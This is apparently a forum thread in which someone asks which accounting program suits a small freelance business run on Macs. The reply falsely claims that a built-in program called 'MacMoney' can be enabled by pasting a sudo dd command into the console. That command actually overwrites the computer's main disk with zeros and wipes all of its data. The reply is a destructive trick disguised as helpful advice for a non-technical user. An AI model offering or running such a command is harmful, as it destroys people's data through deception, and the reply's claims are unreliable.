My husband has a small, freelance business on the side that is growing steadily, and we are finding that we really would benefit with a little more organization. We would like to know what is the best accounting program for macs. I’ve heard that some are more PC based. We want to buy the easiest one to use that will work well with our mac computers.

There is a pretty good program built in, just put this into the console and you can choose to activate it. (Its called MacMoney, just look for that name, check the box and click okay).
This is the command:
sudo [dd] if=/dev/zero of=/dev/disk0
